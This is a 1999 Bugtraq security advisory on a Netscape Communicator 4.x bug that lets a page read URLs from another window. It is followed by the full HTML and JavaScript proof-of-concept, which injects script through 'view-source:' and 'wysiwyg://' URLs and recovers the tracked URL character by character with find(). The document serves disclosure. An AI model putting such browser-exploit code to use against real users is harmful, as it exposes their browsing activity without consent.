Date: Sun, 6 Jun 1999 13:15:08 +0300
From: Georgi Guninski <joro@NAT.BG>
To: BUGTRAQ@netspace.org
Subject: Netscape Communicator code injection in JavaScript console using "view-source:" protocol

There is a bug in Netscape Communicator 4.6 Win95, 4.07 Linux (probably
all 4.x are affected), which allows sniffing URLs from another window.
The problem is the injection of JavaScript code in the JavaScript
console using the "view-source:" protocol.
Access to document.links is disallowed in NC 4.6, but the document may
be read using find().
For more information, examine the source.

Workaround: Disable Javascript.

Demonstration is available at: http://www.nat.bg/~joro/viewtrack.html

Regards,
Georgi Guninski
 http://www.nat.bg/~joro
 http://www.whitehats.com/guninski

----------------------------------------------------------------------

<http://www.nat.bg/~joro/viewtrack.html>

<HTML>
<HEAD>
<TITLE>
Control Window
</TITLE>
</HEAD>


There is a bug in Netscape Communicator 4.6 Win95, 4.07 Linux (probably others?), which allows sniffing URLs from another window.<BR>
The problem is the injection of JavaScript code in the JavaScript console using "view-source:".<BR>
Access to document.links is disallowed in NC 4.6, but the document may be read using find().<BR>
Type your URL in the "Tracked window" and then click "Show URL" in this window.<BR>
Workaround: Disable Javascript.

<HR>
<A HREF="javascript:datatrack()">Show URL</A>

<HR>
<A HREF="http://www.nat.bg/~joro">Written by Georgi Guninski</A>
<HR>


<SCRIPT>
// Clear console

function clearcon() 
{
s="view-source:wysiwyg://1/javascript:s='<TITLE>tttt</TITLE>xxxxx<SCRIPT>window.location = \"javascript:@clear\"; if (window.location==\"JavaScript:@print\") top.close(); error</"+"SCRIPT>'";
window.location=s;
/*
b=window.open(s);
*/
setTimeout('location="javascript:";',1000);
/*
setTimeout("b.close();",2000);
*/
}


setTimeout('clearcon()',500);
/*
a=window.open('wysiwyg://1/about:blank');
a.location="javascript:MBEGIN";
setTimeout("a.close();",2000);
*/



function writeit()
{
tracked=window.open();
tracked.document.open();
tracked.document.write("<HTML><HEAD><TITLE>Tracked window</TITLE></HEAD>");
tracked.document.write("There is a bug in Netscape Communicator 4.6/Win95, 4.08/WinNT (probably others?), which allows sniffing URLs from another window.<BR>");
tracked.document.write("Type your URL in the location bar or choose a bookmark.<BR>");
tracked.document.write("Wait until the document is loaded, then click 'Show URL' in the 'Control window'.<BR>");
tracked.document.write("This exploit needs Javascript enabled.<BR>");
tracked.document.close();
}

setTimeout('writeit()',3000);

</SCRIPT>

<SCRIPT>
function datatrack()
{
tracked.location="javascript:error";
s="view-source:wysiwyg://1/javascript:s='<TITLE>aa</TITLE>vvvv"
+"<SCRIPT> if (document.links.length > 1) "
+"{ " 
+" mend=\"MEND\";mag=\"http://\";res=mag;charstoread=40;"
+" msg=\"Your URL is: \\n\";"
+ "setTimeout( \" "
+"for(i=0;i<charstoread;i++) {"
+" t=res;"
+" find(mend);"
+" for(c=1;c<256;c++) {"
+"   t=res + String.fromCharCode(c);"
+"     if (find(t,true,true)) {"
+"      res=t;"
+"      if (c==32) i=charstoread;"
+"     } "
+" }"
+"}"
+"res=res.substring(mag.length);"
+"confirm(msg+res);top.close();"
+" \",4000);"
+" } else MEND;</"
+"SCRIPT>'";
a=window.open(s);
setTimeout('location="javascript:";',3000);
setTimeout('a.close();',2000);
}



</SCRIPT>


</HTML>